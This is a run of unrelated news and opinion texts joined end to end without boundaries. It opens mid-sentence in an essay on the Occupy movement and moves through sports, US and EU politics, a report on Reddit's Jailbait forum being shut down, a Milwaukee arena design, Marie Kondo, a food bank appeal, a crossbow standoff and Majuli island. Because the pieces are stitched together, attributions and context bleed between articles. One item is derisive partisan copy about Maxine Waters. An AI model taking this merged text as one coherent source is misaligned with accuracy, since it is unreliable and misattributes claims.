can be recognised as the same brand of over-generalised reactionary nonsense illustrated by those that would see the protest as “ pathetic . ”
The responsibility to inform oneself as accurately as possible before endeavouring on such a worthy cause has not taken solid roots yet among some of the protestors . Yet , what is there is an idea that what they are doing is right ; that there is something holistically and vehemently correct about their desires . Understandably , some are so blinded by the news of bailouts , crashes , austerity measures , E.U . emergency meetings , Moody's/S & P 's ratings , and the figurative collapse of the Eurozone that it can seem like a relentless snuff film . This snow-blindness seems to cause an instinctual reaction ; a collective and overtly negative reaction to a problem that can come across as being too complex for them to bother their time with . But Goddamnit , I 'm as mad as hell and I 'm not gon na take it anymore ! The majority of this media consumption is fortunate for people and some of us only see the reflection of this crumbling result of corporate greed and financial instability as just that : a reflection across screens , tabloids and broadsheets . A mirror image of the destructive force wielded by man 's own insatiable thirst for more at the cost of stability . And of course , this reflection blinds the left side of this hypothetical segregation to the almost hyperbolic amount of information that can be accessed on the subject . Just as the bonuses , incentives and thirst for monetary ascension blind the other side of this divide , so too does the blistering bewilderment of financial cacophony tarnish the will power of those who would speak out against the fiscal inequality at hand .
Nonetheless , this is the excavation of an inequality . The numbers and percentages may be exaggerated and hyperbolised for slogans and posters but the fact remains that this is the negative externality of the antics across the financial sector over the last 20 years . We were sold the idea that money could literally be created in an exponential fashion because we were sold the initial ideological product that the markets were sound and stable . As it turns out , this was and is not the case . An entire civilisation has been cognitively colonised to perceive capitalism and its affiliates as an ideological constant ; unbiased and concrete . However , while the ideal may be an inhuman system bereft of the capability to directly harm , it simultaneously offers a playground for some of the most dangerous and inevitable human attributes : arrogance and greed . Thus , this is an esoteric colonial power that seems to require purging . I support the Occupation wholeheartedly , but this will be a segregation that is fore-grounded on the streets and won in perception . The ideology is the coloniser perpetuated by those who have sought to wreak their thirst for cash on global finances . It is wrapped in hypocrisies , oxymoronic economic languages and cognitive paradoxes that are in some ways set up to distract the public from the darker side of this perception . But ideologies can change , and change they will .
* * *
Over the past several weeks a movement has targeted “ the hearts and minds ” of an entire culture while systematically refraining from stimulating the grotesque urges of the mass media 's pantomime . Riots have broken out in select cities but either as the result of unjustified police brutality or continuing complex austerity measures in Europe . Certainly , there is an ideologue handle from all angles : The “ 1 % ” wish to handle their image throughout the corporately owned or controlled media facets , in the face of the conscientiously well-behaved “ 99 % ” . All the while the internet , bloggers , independent ( pinch-of-salt required ) media enclaves , and thus the public are perpetually framing and reframing the movement and its immediate ramifications . Therefore , this is a movement that is being proportionally fought in the war room of perceptive ideologies . The immediacy with which conclusions are drawn within discussions on the subject is thus endemic of this process of perpetual reframing . There is no positive dialogue about what the ‘ endgame ' is or even could be . Is this a movement to overthrow capitalism ( for want of a hyperbole ) ? Or is this a movement to reform the twisted mores of a socially inept and ethically bankrupt economic system ?
Moreover , what are the benefits of having such a leaderless movement ? Realistically , it can only be a matter of time before the Occupation becomes subject to social arbitrage . Someone , or some power , will take advantage of this gathering and push it towards a focused agenda . However , the faculties of such an assumption have yet to be realised . What is sure is that this is a move forward in a search for something alternative to the waning offers of systemic capitalism . The ‘ Cultural Logic of Late Capitalism ' seems to be more and more illogical as this existential quandary grips the Western World . Through literature , art , film and media , postmodernism is losing its relevance as people unwittingly or knowingly search for a ‘ New Sincerity ' in a broader schema . Hence , the never-ending rabbit hole that is the research and analytic consumption of what went so drastically wrong over the last 15 to 20 years within the financial world has thrown the public away from merely accepting the theoretical ideologies of monetary value within this system . The nonsensical trail of hedge-funds , CDOs , CBOs , CMOs , derivatives , lobbying , credit default swaps , and a whole host of other tricky regulatory loopholes has left the holistic imprint upon society that there was really no other point to this hypothetical law other than greed and illogical growth . Sustainability was then forsaken so as to promote a massive and unreasonable boom in consumption , production and speculation . From here , it will be important to drive for a sustainable sincerity across all platforms of this debate so as to successfully drive an honest and reasonable rebirth of socially driven democracy .
All these things are questions for another day .
There is no real need or want for a segregated class or ideological war . There is no real need to put so much faith in such a ridiculous premise as the one the financial services industry has created itself to be . Yet , there will be a need to closely watch how this movement is handled . It will be forever in danger of slipping into obscurity or being abstracted from its goals , and perhaps this is why it must eventually settle down to drawing out actual goals . For now though , they are as mad as hell , and they are beginning to not take this shit anymore .
Jake O'Brien
Advertisements
Daniel Sturridge , the Chelsea striker on whom Stuart Pearce is relying for goals in his Team GB side at the London Olympics , may have to pull out of the squad after undergoing tests for suspected meningitis .
Having missed out on Roy Hodgson 's England Euro 2012 squad , Sturridge was this week selected by Pearce and was due to be handed his favoured central striking role . But Sturridge is now a doubt for the tournament , which begins with a match against Senegal at Old Trafford on July 26 , after undergoing medical tests .
The results will be assessed by Football Association medical staff over the coming days , with the squad due to meet at the Team GB holding camp in Loughborough at the weekend .
A training camp in Spain will follow , before a warm up match against Brazil at Middlesbrough 's Riverside stadium on July 20 .
Pearce is unlikely to make an immediate decision on Sturridge 's involvement and has until 25 July to decide on a potential replacement if the player is forced to withdraw .
It is understood that Sturridge fell ill over the weekend and that Chelsea club doctors and specialists have been monitoring his progress while they await test results . His condition is believed to have improved over the past 24 hours .
Although it has not been made public by the FA , it is understood that the four players currently on the standby list are the Norwich City defender Ryan Bennett , the Reading goalkeeper Alex McCarthy , the Huddersfield striker Jordan Rhodes and the Crystal Palace winger Wilfried Zaha . Either Rhodes or Zaha would appear to be the natural replacements for Sturridge should he not make it .
However , the four players on the standby list can technically be replaced by any others on the original long list of 35 up to 25 July , the eve of the first match . The four players named as being on standby at that point can then be called into the squad at any time during the Games if an injury occurs.If he was forced to pull out , it would also be the latest injury blow to Pearce 's plans . Tottenham Hotspur 's Gareth Bale withdrew from contention for the squad at the end of last week after aggravating a back injury . Others who would have been in contention had it not been for injury include Bale 's teammate Kyle Walker and Manchester United defender Chris Smalling .
WASHINGTON — Around 6:30 each evening , Secret Service agents gather in the dim hallways of the West Wing to escort Donald Trump home .
For some presidents , the short walk between the Oval Office and the White House residence upstairs is a lifeline to family and a semblance of normal life . Others have used the grand residence for late night entertaining and deal-making with lawmakers .
Advertisement :
For Trump , life in the White House residence is so far a largely solitary existence . With his wife and youngest son living in New York , and his grown children busy with their young families , Trump 's first evenings have been spent largely alone , tethered to the outside world only by his phone and his television . The dramatic change of scenery has left the 70-year-old president , a known creature of habit , a little adrift in the evenings , according to one person who spoke with him recently .
Another regular contact described the president as still adjusting to this new digs and his somewhat more confined schedule . His advisers initially said they expected him to spend his evenings holding working dinners , like one scheduled Thursday with Republican mega-donor Sheldon Adelson .
While Trump has marveled at the history and beauty of his new home , `` it 's still government housing , '' said Christopher Ruddy , the CEO of Newsmax and a friend of the president 's .
A half-dozen other friends , advisers and associates of the president spoke about his first weeks in the White House on the condition of anonymity in order to detail private conversations .
The interviews underscore the relatively large circle of people who have spoken with the new president , despite the busy schedule and enormous pressures of the job . Trump has been spending his nights making and taking calls to an expanding network of old friends , lawmakers and others .
Calls often come in to Trump 's personal cellphone , which he fought staff and his security team to keep . Rather than hold lengthy conversations on the unsecured line , Trump often calls people back on other lines , sometimes going through the White House switchboard .
Advertisement :
The president , who says he 's sleeping four or five hours a night , is dialing up associates late at night and early in the morning , before he returns to the West Wing . He recently reached House Speaker Paul Ryan while the Wisconsin Republican was in the middle of an early morning workout .
Ryan has become a more frequent point of contact for the president , who has been touting his improved relationship with the speaker in conversations with advisers and associates . Their discussions are said to largely focus on policy , including health care and tax reform , the latter an issue where the speaker 's office is trying to bring the White House closer to House Republicans ' position .
Trump has privately conceded some early missteps after a turbulent start to his term , including the flawed rollout of his controversial refugee and immigration plan and a lack of clear lanes for his top advisers . But despite public opinion polls showing less than 50 percent of Americans approve of his presidency thus far , Trump has sounded confident about his standing .
During one late night discussion , Trump was already talking about seeking a second term . When an associate suggested he was weakening Democrats by usurping some of the party 's best policy ideas , the president readily agreed .
Advertisement :
When he is n't talking about his early presidency , Trump — who is sometimes joined by his longtime security chief , Keith Schiller — is often watching others talk .
The president 's advisers have tried to curb his cable news consumption during the workday . But there are no limits when the president returns to the residence . During another recent telephone conversation , Trump briefly put down the phone so he could turn up the volume on a CNN report . When he returned to the call , he was complaining about `` fake news . ''
In some ways , his new lifestyle in the White House resembles the routines he created during decades living atop Trump Tower . He long has preferred the comforts of home , eschewing much of Manhattan 's social scene in favor of evenings in his penthouse with close friends , family and his television .
Advertisement :
First lady Melania Trump and the couple 's 10-year-old son , Barron , are staying in New York at least until the end of the school year . Mrs. Trump has n't been seen in Washington since the weekend of the president 's inauguration , and Trump has yet to return to New York . The Trumps did spend last weekend together at Mar-a-Lago , the president 's palatial South Florida club .
Trump 's daughter Ivanka and her husband , White House senior adviser Jared Kushner , made the move to Washington , but have focused on getting their young family settled into life in a new city . The couple also spend some evenings dining with business and political contacts .
Trump is returning to Mar-a-Lago again on Friday with Japanese Prime Minister Shinzo Abe and may keep making weekend trips for the rest of the month . Friends who saw the president at the coastal estate last weekend described him as relaxed , particularly at a black tie gala for the Red Cross and on the golf course with some of his regular playing partners .
Advertisement :
Despite Trump 's weekend escapes , advisers say he has taken to the White House . He 's told associates it feels like a movie set and has spent time making sure it looks up to his standards , according to one person who has been in contact with him . The Trumps have hired Tham Kannalikham , a low-profile interior designer , to help put their touch on the White House residence .
During a recent interview with Fox News , Trump said he was walking into the main entrance of the White House one day and said to himself , `` This is sort of amazing . ''
`` It 's like a surreal experience , in a certain way , '' Trump said . `` But you have to get over it . ''
___
Advertisement :
Lemire reported from New York .
___
Follow Julie Pace at http : //twitter.com/jpaceDC and Jonathan Lemire at http : //twitter.com/jonlemire
Maxine Waters wants the leaks to continue even if they are confidential ! Waters was on The View when she claimed she 's glad that the leaks are happening ! This woman is off her rocker !
OUR LATEST VIDEO ON “ MAD MAXINE ” :
MAXINE GOT A MAKEOVER and is hopping mad about speculation she 's running for POTUS in 2020 . It ca n't help that Tucker Carlson is mocking her just about every night .
take our poll - story continues below
Will the media learn anything from their biased reporting of the Jussie Smollett story ? Will the media learn anything from their biased reporting of the Jussie Smollett story ?
Will the media learn anything from their biased reporting of the Jussie Smollett story ? * Yes , they 've gotten so much wrong recently that they 're bound to be on their best behavior . No , they suffer from a bad case of Trump Derangement Syndrome . Jussie who ?
Email *
Phone This field is for validation purposes and should be left unchanged . Completing this poll grants you access to 100PercentFedUp.com updates free of charge . You may opt out at anytime . You also agree to this site 's Privacy Policy and Terms of Use .
Trending : OSCARS 2019 : A Hot Mess Of Leftist Politics and Activism On Display [ Video ]
Waters was in a foul mood during an interview with her favorite news anchor…Joy Reid . Reid is a foot soldier for Waters . These two get together every other day to bash Trump . Pitiful !
The funny thing is that no one was criticizing Waters . They were merely speculating if she is considering a presidential run , something she has admitted to if she had the support of millennials . Right ?
Waters told Reid : “ Just because I 'm going to New Hampshire to be at a Democratic Party event for one of my colleagues , they made this story up . , or to make people uncomfortable with me , all of that . So you 're gon na be hearing a lot more from them these people who are all , you know , aligned around trying to discredit Maxine Waters because she has stayed on Trump 's case so much . And so you 're going to hear a lot more from them . Do n't believe anything they 're saying . ”
LONDON ( Reuters ) - The European Union Youth Orchestra is moving to Italy from London , its home for more than 40 years , in an early example of the cultural fallout from Brexit .
FILE PHOTO : A protestor waves an EU flag as he walks past the Houses of Parliament in central London , Britain September 22 , 2017 . REUTERS/Toby Melville
The prestigious organization , which has worked with some of the world 's most famous conductors , relies on EU funding which would almost certainly no longer be available to UK-based organizations after Britain leaves the bloc in March 2019 .
“ The EUYO is a vital cultural and political resource for Europe and for the EU , and I am delighted that the orchestra 's long-term stability has now been effected , ” said Vasily Petrenko , the orchestra 's chief conductor , in a statement .
The orchestra will move next year to new headquarters in Rome and in the northern Italian city of Ferrara , it said .
Its founding music director was the late Italian conductor Claudio Abbado and it was invited to move to Italy by Culture Minister Dario Franceschini .
Founded in London in 1976 , it has been headquartered in the British capital ever since . Britain joined the precursor of what is now the EU in 1973 .
The orchestra auditions every year for new members , who must be aged between 16 and 26 and come from an EU member country .
Its website says that British musicians are still eligible to apply this autumn to join the orchestra in 2018 , when Britain will still be a member .
“ The arrangement for future years will depend on the details of the agreement negotiated between the EU and the UK , ” it says .
Britain 's decision in a June 2016 referendum to leave the bloc was a severe blow to many in the arts world , where cross-border collaboration and the ability to tour freely around Europe are valued particularly highly .
Citizens in Hungary have voted in a controversial referendum to reject the European Union 's plan to distribute migrants across the bloc . However , data from the National Election Office 's special referendum website suggest the number of voters was less than 50 percent , invalidating the result .
According to the National Election Office , more than 98 percent of voters rejected the EU 's migrant quota , while just 1.67 percent voted in favor of it .
Speaking after the results were announced , Prime Minister Viktor Orban said the results needed to be taken into account by EU decision-makers .
`` Thirteen years after a large majority of Hungarians voted at a referendum to join the European Union , today Hungarians made their voices heard again in a European issue , '' Orban told a news conference in the capital , Budapest .
`` We have achieved an outstanding result , because we have surpassed the outcome of the accession referendum , '' he added . He said he would submit an amendment to Hungary 's constitution based on the plebiscite .
' A sweeping victory '
Earlier , governing Fidesz party vice president Gergely Gulyas expressed doubts that the vote could be invalid .
However , regardless of the numbers , the result was `` a sweeping victory for all those who reject the relocation plan , for those who believe that only nation states should remain and for those who believe in democracy , '' he said .
Opposition members protested in Budapest , holding a poster of Orban that read `` What have I done again ? ''
Before results were announced , Orban said there would be `` legal consequences '' regardless of the outcome of the poll . `` A valid referendum is always better than an invalid one , but the legal consequences will be the same , '' he said . `` There is only one condition for this : that there are more 'No ' votes than 'Yes ' votes , '' he added .
Opposition parties and rights groups had called on Hungarians to boycott the referendum , which was organized by Orban to whip up support against the EU 's planned quota to distribute refugees across member states .
Eastern European countries , including Hungary , Slovakia and Poland , have vehemently opposed accepting migrants . Hungary has refused to accept even one of the 1,294 refugees allotted to it and has instead filed a legal case against the EU , together with Slovakia .
Refugees languish on Hungarian border Unwelcome but undeterred On Sunday , Hungarian voters will decide whether or not their country will accept refugees relocated from EU nations in a referendum called by Prime Minister Viktor Orbán . Analysts predict an overwhelming ‘ No ' vote , which is largely symbolic as it is unlikely to impact decisions in Brussels or reduce a persistent flow of asylum-seekers to border transit areas such as Kelebija .
Refugees languish on Hungarian border The new gates of Europe People arrive in Kelebija to cross this gate . The Serbian and Hungarian governments worked out a deal to allow border transit for up to 20 asylum-seekers a day . After registering with Serbian officials , potential refugees receive a date to appear at the border , where they are interviewed and have their asylum applications reviewed by Hungarian migration agents .
Refugees languish on Hungarian border Transit bottleneck The process is not without faults . Mohamed Gamal , an 18-year-old Egyptian ( not pictured above ) , arrived in Kelebija after seeing his name on a list of people to be interviewed . When he spoke with border officials , they said the appointment was for another Egyptian of the same name and that they had no records showing he entered Serbia .
Refugees languish on Hungarian border Minimal assistance Having few options , Gamal stayed in the transit camp of about 100 people who were also awaiting asylum appointments . One water spigot was available on site and few organizations visit the camp daily . People make do in the camp with minimal assistance . Pictured above is one of nine children in a Yazidi family that had been at the camp several weeks .
Refugees languish on Hungarian border 24/7 patrol `` I will find another way , '' Gamal told DW , saying he was negotiating with smugglers onsite . He paid 1,500 euros the prior month to breach the fence , but was caught and bused back to Belgrade . Helicopters and 24/7 patrols have made illegal crossings increasingly difficult . `` Believe me , if you run faster than the police , they will send the dogs on you . ''
Refugees languish on Hungarian border 'Better Than Other Places ' The children of Walid Khaled , a car mechanic from Irbil , Iraq , play by the border fence . It 's been two months since Khaled arrived at the camp , where his family has suffered setbacks due to confusion over their immigration documents . `` The police tells us ' I do n't know , I do n't know , ' '' he said . `` Here it 's bad , but it 's better than other places . ''
Refugees languish on Hungarian border No turning back Kelebija hosts one of two camps in the area . Middle Eastern refugees stay here , while Afghans and Pakistanis stay in Horgos . As he fed a campfire with donated diapers and clothing , Khaled said he preferred staying in Kelebija - despite the fact his prospects of crossing the border were n't improving - because his family had been robbed repeatedly in other camps .
Refugees languish on Hungarian border Howls from passing truckers The next morning , southbound truckers mocked camp inhabitants by howling like monkeys into their megaphones . `` In Greece , the average person , if you talk to them , displays sympathy , '' said Sydney Fernandez , field coordinator for North Star , a Serbian humanitarian organization . `` Here , locals have the mentality that these people should have stayed home to fight for their land . '' Author : Diego Cupolo ( Kelebija , Serbia )
mg/cmk ( AFP , Reuters )
It appears a user of the popular message board Reddit has been caught distributing child pornography on a section of the site dedicated to sharing sexualized images of underaged girls . What a shock .
Two former moderators of Reddit 's popular Jailbait section say that a Reddit staff member admitted to them child porn had been transmitted thanks to a post on the site Sunday night . Now Jailbait—which had been fiercely defended by Reddit 's staff as a matter of `` free speech '' even as it attracted criticism from the likes of Anderson Cooper—has been closed down for good .
The scandal started late Sunday night , when a user named TheContortionist posted a picture of what he claimed was his then-14-year-old girlfriend to Jailbait . Until its abrupt closure yesterday after the scandal , Jailbait was the home of more than 20,000 subscribers who posted pictures of scantily-clad—but clothed—teens—many stolen from their Facebook profiles . Jailbait 's founder has boasted that it was in the top 15 sections of the site , and it has long been a hallmark of Reddit 's extreme tolerance of controversial and abusive content . ( Reddit is owned by Advanced Publications , the same parent company as magazine giant Conde Nast , of which it was a division until recently . )
The picture TheContortionist posted on Sunday was of his 14-year-old supposed ex-girlfriend 's underwear-clad butt . Nothing out of the ordinary for Jailbait . But users quickly began clamoring for more , `` voting up '' his post more than 200 times . TheContortionist admitted to having child pornography , telling users `` this is the only non nude photo I have of her . '' Still , more than 70 Redditors begged TheContortionist to send them the underage nude pictures via Reddit 's private message system .
After a few hours , TheContortionist relented somewhat and posted another picture . `` Fine , here ! '' he wrote . `` Note : I had to edit the photo for obvious reasons . Enjoy your fap . ''
According to Matthew Sharkey , a Reddit user who was monitoring the thread at the time , the picture was of a child 's face with blond hair . The top and bottom of the image was censored with images of the Power Puff Girls , but Sharkey says that , based on unobscured parts of the image and comments made by TheContortionist , the girl in the picture was engaged in oral sex . ( Sharkey notified the FBI about the thread soon after . )
The new picture set off another spate of users asking for a `` pm '' —presumably of the uncensored image .
Ildeon : For the love of god , PM !
mr8173 : pm
megagreentea : It is your duty to hook us all up
Omgnoway111 : Huh so is he actually pm ing us ? ? If so PM !
Drummerboyz95 : `` PM me with the others please ? I 'm 15 btw . ''
Outraged Reddit users exposed TheContortionist post , voting it up to the front page of the site . TheContortionist 's was eventually deleted by Reddit staff , more than six hours after it went up . But by then some of the users apparently got the kiddie porn they were drooling after . According to a post by Jailbait moderator I_RAPE_PEOPLE ( really ) , Reddit staffer Jason Harvey emailed the half-dozen moderators of Jailbait and told them that `` Child pornography was actually transmitted through private messages , the admins are dealing with it . '' ( I_RAPE_PEOPLE later edited his post to say pornography had `` most likely '' been transmitted . )
Deleting the post was n't enough for Reddit administrators , however . They shut down Jailbait yesterday , saying it was closed `` due to threatening the structural integrity of the greater reddit community . '' ( Jailbait was briefly shuttered in August , but this time it 's apparently gone forever . ) Nerd rage has predictably ensued .
`` Today , with the shutdown of /r/jailbait , Reddit has entered a new age , '' wrote one mournful user .
The closing of Jailbait is an embarrassing backtrack for Reddit , which has repeatedly said that shuttering the controversial section would be an act of oppressive censorship . Many Reddit users agree that the key issue of Jailbait was their freedom of speech , not underage girls ' freedom to not be masturbated at and verbally harassed by tens of thousands of users on a website that boasts more than a billion pageviews a month .
Just last week , Reddit general manager Erik Martin was asked by tech blogger David Weinberger about Jailbait . He replied :
`` There 's stuff on there that 's extremely offensive and reprehensible . but we 're not an editorial site . If something 's legal we do n't touch it . ''
Until yesterday , Martin and Reddit 's staff were apparently comfortable that Jailbait 's community moderators , users like I_RAPE_PEOPLE and Violentacrez—a 50-something Texas software engineer who openly brags about having oral sex with his 19-year-old step-daughter—could keep Jailbait just this side of the law . But , whether they eventually admit it or not , Jailbait turned into a hub for fans of outright child pornography . It 's good that they shut it down . But what about the dozens of Jailbait knock-offs that Redditors point out still exist on the site ? Shut them down too .
Reddit 's list of 56 guidelines governing its supposed unfettered free speech includes things such as `` please do n't write titles in ALL CAPS '' and `` please do n't submit an image that 's just text . '' It 's not that hard to add `` No underaged sexy pictures . ''
Reddit administrators did not respond to our requests for comment .
A rendering of the new Milwaukee Bucks arena shows the planned design for entrances at the east side of the building and the abstract roof , which begins on northern edge of the building and will be clad in zinc panels treated to achieve a gritty , brown-rust patina . Credit : Populous
The first detailed glimpse of the new downtown Milwaukee arena reveals a giant building with a dramatically arcing roof , curving body , tall sheets of glass , social spaces — and a few challenges yet to overcome .
The Milwaukee Bucks will share the development plans with the City of Milwaukee on Thursday ; several renderings were released in advance to the Journal Sentinel . They are considerably more detailed than the conceptual renderings released in April 2015 and represent the first step in a public design approval process that 's required for construction to begin .
More importantly , they underscore the broader vision for the signature project , which has been both controversial and more anticipated than any downtown project since the Milwaukee Art Museum addition designed by Santiago Calatrava .
`` I think in 10 or 20 years from now , you 'll look back and say this was the spark that changed downtown Milwaukee , '' said Brad Clark of Populous , one of the lead architects on the job . The architects are careful to describe the submitted plans as in-progress .
The shape of the 714,000-square-foot arena 's arcing roof has changed subtly from initial plans . The abstract , wavelike form begins near the base of the building on W. Juneau Ave. and arcs dramatically over the glassy entrance .
The roof is the `` big move , '' the statement of the $ 500 million building , said Clark . It will be clad in long , thin zinc panels chemically treated to achieve a gritty , brown-rust patina . The matte panels can take on a leather-like look and will change appearance in varying types of light , said Gabe Braselton , one of the lead project managers at Populous .
The idea for the wavelike shape surfaced in sketching sessions among Populous architects before the firm had been hired and when the Bucks were still eyeing the Journal Sentinel site , near the Milwaukee River .
`` We think there 's beauty to the region and water is a big part of that , '' Clark said , adding that they also wanted to emphasize Milwaukee 's industrial grit . `` We know that 's important to your community . ''
The new plans reveal a more obviously curved facade on W. Juneau Ave . The sculptural , zinc-shingled side is punctuated with thin windows of varying widths that are angled for a faceted appearance .
`` You are going to see these glass slots that go up six stories , that curve over your head , '' said Greg Uhen of Eppstein Uhen Architects , a local firm working on the project , adding that the north face of the building will be especially striking at night .
The windows will be treated with a ceramic silk-screen pattern to accentuate the curvy shape of the building . The glass will be more transparent where the exterior bulges and more opaque near the base and roof .
The ceramic treatment — called fritting — will be used in varying degrees of opaqueness on horizontal bars of glass on the glassy entrance , which remains similar to designs revealed last year .
The exterior facades facing 6th St. and Highland Ave. , which will be opened up to traffic according to the plan , are also being seen for the first time . The 6th St. side of the building , featuring a 30-foot-tall section that is distinct from the main arena structure , features a smaller entrance , a functioning mechanical yard and an enclosed loading dock .
It is the part of the building that 's raised the most questions about scale and materials among city officials , the architects say .
`` I think that 's our biggest challenge , '' Clark said , adding that the design is still being actively worked on .
The architects have also decided to construct the arena completely above ground , which presents additional challenges , including creating a welcome environment for pedestrians . It means the whole volume of the building is visible , making it taller and tighter to the edges of the site than originally hoped for .
Proximity to the water table prevented the below-grade approach . `` It was a multi-multimillion dollar challenge , '' Clark said . Still , the arena will be shorter by about 25 feet than its predecessor , the BMO Harris Bradley Center .
Inside , the arena is designed to accommodate a variety of events , from basketball to ice shows to rodeos .
`` I think the multipurpose arena is the most complex thing we do , '' Clark said of Populous , a Kansas City , Mo.-based firm that specializes in sports architecture . `` They 're like a Swiss Army Knife . ''
The lobby is a soaring 90 feet tall , meant to be a place of occasion and people watching , with grand staircases flanking each side . Every level of the arena opens up into this space , offering city views . Columns are angled to give the lobby a more dynamic feel .
The interior is designed as a machine to generate revenue for its owners , while providing fans with more social spaces . There are open bar areas where fans can grab a drink and still see the game , various levels of specialty suites , function spaces , exhibit areas and what the owners hope will be a high-energy club perched at the top of the tall lobby with an outdoor balcony . Many of these spaces and others are ripe for sponsorships , the architects said .
The 17,500-seat bowl is a blend of the geometries used for hockey , typically long and rectangular , and basketball , which is usually short and square . The highest seat in the new arena will be considerably lower than the upper seats at Bradley Center , and fans will always walk down to their seats . ( The Milwaukee Admirals , though , recently announced the hockey team will move to the UW-Milwaukee Panther Arena in the fall . )
The Bucks hope to break ground on the arena in July , though no firm date has been set . The arena is planned to open by the start of the 2018-'19 National Basketball Association season . The plan is scheduled to go before the City Planning Commission on April 4 .
I 'd like to share some ideas on how you can use the concept of tokimeku in your own life .
Before you start deciding what sparks joy in your life , you must first get a true sense of the problems you face . For example , when organizing clothes , I ask that you take out all the clothes you own and gather them in one spot , so that you can visually comprehend how much you have .
What we do n't often realize is that the furniture and closets in which we store our clothing have a remarkable way of concealing truths we would rather not see ( a pilled sweater , for instance , that does not bring any joy ) . It 's perfectly fine to take advantage of this masking effect on a small scale , but when the amount of things that you do n't need continuously increases — along with the time and space that you devote to accumulating those things — you will find that it becomes harder to lie to yourself .
Image Marie Kondo . Credit Natsuno Ichigo
We also work in much the same way . We often hide our problems inside the closet of our hearts as if they never existed . Whenever my mind clouds over and I feel overwhelmed , I immediately take out a sketchbook . I write down all the emotions that I feel and the possible reasons behind them across a blank white page .
Once you 've pinpointed your problems , identify specific solutions . For each problem , assign a concrete task such as “ contact and consult a professional ” or “ reply immediately with an email. ” These actions should be as clear and specific as possible . Indeed , the ultimate goal of organizing is to remedy the state of untidiness and prevent its recurrence .
When choosing these actions , you must never forget to ask yourself whether each action sparks joy and makes sense for you . Once you 've compiled a list , all you have to do is serenely execute these tasks .
I also keep a to-do list in my sketchbook . Each time I complete a task , I put a checkmark next to it . As I complete the tasks one by one , I get a joyful feeling of lightness , as though I have completely finished tidying up my home . It sounds simple , but this is exactly the moment that sparks joy for me .
The “ spark joy ” standard for tidiness depends on the individual . You can not force people to tidy , nor should you try . But there can be communal applications for this idea . More and more , I feel that the question of whether something sparks joy becomes all the more effective when people can exchange views and share a common vision for the future .
Understanding and appreciating the concept of tokimeku in the midst of a confusing and disorderly world will allow us to clarify our ideals , and help us gain confidence in our ability to lead productive lives and develop a sense of responsibility to those around us . From there , we can act with focus and certainty while improving our lives and our beautiful — if still very messy — world .
If the San Antonio Food Bank ca n't collect more donations by Wednesday , Nov. 25 , it will be unable to provide thousands of families with Thanksgiving dinner , officials said during an ‘ emergency ' press conference on Friday .
The local nonprofit has only received about 3,500 of the 12,500 turkey donations expected , citing last minute planning and a major jump in turkey prices since last year as the reasons behind the shortage .
“ We 're a little bit of a last minute community here , and that last minute mindset affects Thanksgiving , ” said Eric Cooper , president and CEO of the San Antonio Food Bank .
According to officials , the turkey donations are the only Food Bank initiative lagging behind their donation goals . Citywide canned food drives and the ongoing Food4SA initiative aimed at raising one million pounds of food during November , have been successful .
“ People get used to hearing ‘ food bank ' and ( think ) non-perishable canned goods , ” Cooper said . “ They often do n't think we can handle perishable food , so it 's a process of educating the community . ”
Individuals and families can click here to donate to the San Antonio Food Bank 's online fund , which buys a turkey dinner with every $ 15 raised . Individuals can also donate money or turkeys during the Holiday Turkey Round Up on Saturday , Nov. 21 , at the H-E-B Plus at Highway 281 and Evans Road , 20935 Hwy 281 N. , from 10 a.m.-2 p.m .
Families can also bring turkeys in-person to the San Antonio Food Bank , located at 5200 W US Hwy 90 , until Wednesday . The turkeys will be stored in on-site freezers before being packaged in food boxes that will be shipped throughout the region .
The Food Bank has already begun sending out food boxes that provide families with alternative protein items including chicken , ham and even hot dogs .
“ They are grateful , ” Cooper said of the families receiving donations . “ They are giving thanks regardless of what they receive , but how cool would it be if we could provide them with what we all expect on Thanksgiving ? ”
Cooper mentioned that corporate sponsors had provided a large number of frozen turkey donations in the past , but that the high price point of turkeys may have affected companies too .
“ We usually get calls from businesses saying ‘ Hey , 200 of our employees do n't want their turkey , so you can have it , ' ” Cooper said . “ We 're just not getting the calls we normally get that would add up to the turkeys that we 've received in the past . ”
The San Antonio Food Bank feeds 58,000 people in 16 counties throughout Southwest Texas each week . Visit www.safoodbank.org for more information on how to give food , money , or time this holiday season .
This article was originally published on Nov. 19 , and has been updated with details from a Nov. 20 press conference .
* Top image : The San Antonio Food Bank sends out a call for turkey donations to help feed needy families during Thanksgiving . Photo by Lea Thompson .
Related Stories :
‘ Canstruction ' Builds Hunger Awareness
Save the Carrots : Volunteers Needed for Food Bank Harvest
‘ Stamp Out Hunger ' During Nation 's Largest Food Drive
Sustainable Charity Takes Root at Expanding Food Bank
0 Orlando man shot by deputy after firing crossbow during standoff
ORLANDO , Fla. - A man was shot by deputies after allegedly shooting at them with a crossbow during a standoff at a home near SeaWorld on Wednesday .
Authorities were called about 9:20 a.m. to the Sacramento Court home in Williamsburg after someone said the man brandished a gun and a crossbow .
Investigators said this all started with an argument inside the house and spilled outside when Timothy Kochlany , 40 , confronted some lawn workers with a crossbow .
All of this went down with the suspect 's mom and daughter inside .
`` We were cutting his lawn today and he came out with a crossbow and two guys , and he said get off his property , ( the ) police are coming , '' Timothy Wolfe said .
Authorities said Kochlany also assaulted his 18-year-old daughter inside the home .
When police arrived , Kochlany barricaded himself inside the home . According to the arrest report , Kochlany fired the high-powered crossbow at deputies through his front door in an attempt to bait them inside .
Authorities said Kochlany , who was hiding in the attic , was pointing what appeared to be a barrel of a long gun at them , which is when a deputy fired at Kochlany , striking him in the arm .
Police said Kochlany went outside and began throwing propane tanks on his lawn .
`` The deputies were concerned that this was some type of booby trap , '' Sheriff Jerry Demings said .
But eventually he gave up , which is when he was able to be apprehended by SWAT deputies .
Wolfe said he cut the suspect 's lawn and used to think he was a nice guy .
`` He gives us water and some food , if we need it . I guess he just had a bad day , '' Wolfe said .
Kochlany was taken to Orlando Regional Medical Center to be treated for the gunshot wound . His injuries did not appear to be life-threatening .
Kochlany faces aggravated assault charges and aggravated battery charges .
No other injuries were reported .
The deputy who shot the suspect is on administrative leave .
As a braided river — one that divides into a labyrinth of tributaries and channels — the Brahmaputra was essentially tossed off its tracks after a major earthquake in 1950 . The quake raised the river 's floor , increased its load of sediment from the Himalayas and shifted some of the deeper channels so that currents began pounding Majuli .
Arupjyoti Saikia , a historian and expert on the Brahmaputra who teaches at the Indian Institute of Technology , Guwahati , said that Majuli became an island in the 1760s , after a previous earthquake led to new river channels that severed the area from the mainland and , in doing so , isolated a major hub of Assamese culture and religion . Since the 15th century , Majuli has been a center of Vaishnavism , a monotheistic branch of Hinduism centered on the god Vishnu and his avatar Krishna .
Today , there are 36 monasteries , known as satras , yet erosion has forced several of them to relocate within the island . Another 28 monasteries have been moved off the island altogether .
